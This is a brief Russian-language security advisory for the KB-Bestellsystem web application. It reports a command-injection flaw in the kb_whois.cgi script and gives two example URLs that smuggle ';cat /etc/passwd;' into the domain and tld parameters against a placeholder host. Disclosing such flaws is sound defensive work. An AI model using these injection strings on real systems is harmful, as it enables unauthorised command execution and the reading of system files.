Программа: KB-Bestellsystem
Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре «action» сценарием kb_whois.cgi. Удаленный пользователь может
выполнить произвольные команды на целевой системе.
Пример:
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action= check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action= check_owner&domain=google&tld=.com;cat
/etc/passwd;&tarrif=